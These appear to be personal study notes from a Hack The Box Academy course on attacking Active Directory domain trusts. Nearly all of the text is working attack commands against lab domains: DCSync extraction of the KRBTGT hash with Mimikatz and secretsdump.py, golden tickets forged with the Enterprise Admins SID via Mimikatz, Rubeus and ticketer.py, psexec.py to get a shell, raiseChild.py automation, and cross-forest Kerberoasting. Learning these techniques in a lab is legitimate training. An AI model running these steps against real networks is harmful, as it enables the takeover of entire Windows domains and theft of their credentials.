Domain Trust Enumeration

Enumerate Domain Trusts (PowerView)

Show Existing Trusts

Get-Domaintrust

Show Trust Mapping

Get-DomainTrustMapping

Show Users in the Child Domain

Get-DomainUser -Domain LOGISTICS.INLANEFREIGHT.LOCAL | select SamAccountName

Attacking Domain Trusts - Child -> Parent (Windows)

To perform this attack after compromising a child domain, we need the following:

1. The KRBTGT hash for the child domain

2. The SID for the child domain

3. The name of a target user in the child domain (does not need to exist!)

4. The FQDN of the child domain.

5. The SID of the Enterprise Admins group of the root domain.

6. With this data collected, the attack can be performed with Mimikatz.

1 Obtaining KRBTGT NT Hash

mimikatz # lsadump::dcsync /user:LOGISTICS\krbtgt

2 Obtaining SID Child Domain

Get-DomainSID

3 Name Target User

# Can be a fake usernamr

4 FQDN Child Domain

Get-Domaintrust

5 SID Enterprise Admins Group

Get-DomainGroup -Domain INLANEFREIGHT.LOCAL -Identity "Enterprise Admins" | select distinguishedname,objectsid

6 Putting It All Together

# Mimikatz Way
kerberos::golden /user:hacker /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689 /krbtgt:9d765b482771505cbe97411065964d5f /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /ptt

# Rubeus Way
\Rubeus.exe golden /rc4:9d765b482771505cbe97411065964d5f /domain:LOGISTICS.INLANEFREIGHT.LOCAL /sid:S-1-5-21-2806153819-209893948-922872689  /sids:S-1-5-21-3842939050-3880317879-2865463114-519 /user:hacker /ptt

7 Confirm Ticket

# List Tickets
klist

8 DCsync

# Mimikatz
lsadump::dcsync

Attacking Domain Trusts - Child -> Parent (Linux)

We can also perform the attack shown in the previous section from a Linux attack host. To do so, we'll still need to gather the same bits of information:

1. The KRBTGT hash for the child domain

2. The SID for the child domain

3. The name of a target user in the child domain (does not need to exist!)

4. The FQDN of the child domain

5. The SID of the Enterprise Admins group of the root domain

1 Get KRBTGT NT Hash

secretsdump.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 -just-dc-user LOGISTICS/krbtgt

2 Get SID Child Domain

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.240 | grep "Domain SID"

3 Name Target User

Can be any name

4 Get SID Enterprise Admins

lookupsid.py logistics.inlanefreight.local/htb-student_adm@172.16.5.5 | grep -B12 "Enterprise Admins"

5 Putting it all Together

ticketer.py -nthash 9d765b482771505cbe97411065964d5f -domain LOGISTICS.INLANEFREIGHT.LOCAL -domain-sid S-1-5-21-2806153819-209893948-922872689 -extra-sid S-1-5-21-3842939050-3880317879-2865463114-519 hacker

6 Export ccache

export KRB5CCNAME=hacker.ccache 

7 Get Shell

psexec.py LOGISTICS.INLANEFREIGHT.LOCAL/hacker@academy-ea-dc01.inlanefreight.local -k -no-pass -target-ip 172.16.5.5

Automatic Way

raiseChild.py -target-exec 172.16.5.5 LOGISTICS.INLANEFREIGHT.LOCAL/htb-student_adm

Attacking Domain Trust - Cross-Forest (Windows)

Cross-Forest Kerberoasting

# Enumerate Cross Forest Users with SPN
Get-DomainUser -SPN -Domain FREIGHTLOGISTICS.LOCAL | select SamAccountName

# Rubeus /Domain flag
.\Rubeus.exe kerberoast /domain:FREIGHTLOGISTICS.LOCAL /user:mssqlsvc /nowrap

Admin Password Reuse & Group Membership

# Check Foreign Groups
Get-DomainForeignGroupMember -Domain FREIGHTLOGISTICS.LOCAL

# Convert SID
Convert-SidToName <SID>

# Login, if we are part of the administrators group
Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

SID History Abuse

![[Pasted image 20230428181936.png]]

Attacking Domain Trusts - Cross-Forest Trust Abuse (Linux)

Cross-Forest Kerberosting

# Using -target-domain
GetUserSPNs.py -request -target-domain FREIGHTLOGISTICS.LOCAL INLANEFREIGHT.LOCAL/wley